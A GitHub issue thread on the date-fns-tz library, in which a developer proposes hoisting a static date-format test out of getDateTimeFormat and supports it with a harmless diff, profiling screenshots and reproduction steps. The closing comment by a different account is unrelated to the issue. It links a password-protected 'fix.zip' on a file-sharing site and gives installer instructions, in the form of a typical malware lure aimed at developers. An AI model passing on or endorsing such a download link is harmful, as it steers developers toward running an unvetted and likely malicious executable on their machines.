### ISSUE TITLE
performance improvement: extract static testDateFormatted from getDateTimeFormat function

### ISSUE THREAD

**Issue by hurali97** [marnusw/date-fns-tz#296]
### Description:

During our investigation for slowness in one of the application, we found that there's significant amount of time being consumed by `getDateTimeFormat` function. After analysing the function's code, it turned out that instead of re-initialising the `testDateFormatted` each time `getDateTimeFormat` is invoked, we can pull `testDateFormatted` outside of this function, since it's already a static variable.

Once we did this and re-profiled our app again, the results were good, see the comparison below:

![Screenshot 2024-08-28 at 2 17 19 PM](https://github.com/user-attachments/assets/2f5580bc-1d48-43ce-9e89-65b380bddf36)

Following are the changes that we did:

```diff
diff --git a/node_modules/date-fns-tz/dist/cjs/_lib/tzTokenizeDate/index.js b/node_modules/date-fns-tz/dist/cjs/_lib/tzTokenizeDate/index.js
index 9ef828f..d615524 100644
--- a/node_modules/date-fns-tz/dist/cjs/_lib/tzTokenizeDate/index.js
+++ b/node_modules/date-fns-tz/dist/cjs/_lib/tzTokenizeDate/index.js
@@ -56,21 +56,20 @@ function hackyOffset(dtf, date) {
 // to get deterministic local date/time output according to the `en-US` locale which
 // can be used to extract local time parts as necessary.
 const dtfCache = {};
+// New browsers use `hourCycle`, IE and Chrome <73 does not support it and uses `hour12`
+const testDateFormatted = new Intl.DateTimeFormat('en-US', {
+    hourCycle: 'h23',
+    timeZone: 'America/New_York',
+    year: 'numeric',
+    month: '2-digit',
+    day: '2-digit',
+    hour: '2-digit',
+    minute: '2-digit',
+    second: '2-digit',
+}).format(new Date('2014-06-25T04:00:00.123Z'));
+const hourCycleSupported = testDateFormatted === '06/25/2014, 00:00:00' || testDateFormatted === '‎06‎/‎25‎/‎2014‎ ‎00‎:‎00‎:‎00';
 function getDateTimeFormat(timeZone) {
     if (!dtfCache[timeZone]) {
-        // New browsers use `hourCycle`, IE and Chrome <73 does not support it and uses `hour12`
-        const testDateFormatted = new Intl.DateTimeFormat('en-US', {
-            hourCycle: 'h23',
-            timeZone: 'America/New_York',
-            year: 'numeric',
-            month: '2-digit',
-            day: '2-digit',
-            hour: '2-digit',
-            minute: '2-digit',
-            second: '2-digit',
-        }).format(new Date('2014-06-25T04:00:00.123Z'));
-        const hourCycleSupported = testDateFormatted === '06/25/2014, 00:00:00' ||
-            testDateFormatted === '‎06‎/‎25‎/‎2014‎ ‎00‎:‎00‎:‎00';
         dtfCache[timeZone] = hourCycleSupported
             ? new Intl.DateTimeFormat('en-US', {
                 hourCycle: 'h23',

```

<hr/>

### Reproduction

As for the reproduction, I have setup an Expo React Native app [here](https://github.com/hurali97/getDateTimeFormatRepro). Follow the steps below:

- Follow the guide from [here](https://docs.expo.dev/get-started/set-up-your-environment/?platform=android&device=simulated&mode=development-build&buildEnv=local)
- Clone the repo
- run `npm install`
- run `npm run android`
- Once the app launches
-- Hit `cmd + m` on emulator and go to `React native settings` -> disable JS Dev mode
-- Click on `start profiling` - A message "started" will be printed in the console
-- Click on `stop profiling` - A message of length will be printed in the console
- run `npm run pullProfile` - This will pull the profile to the root project
- Open that profile in speedscope or elsewhere and analyse

<hr/>

Based on the linked reproduction, below are the results:

![Screenshot 2024-08-28 at 2 32 03 PM](https://github.com/user-attachments/assets/542686f3-187b-48b2-8137-661591ccc205)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
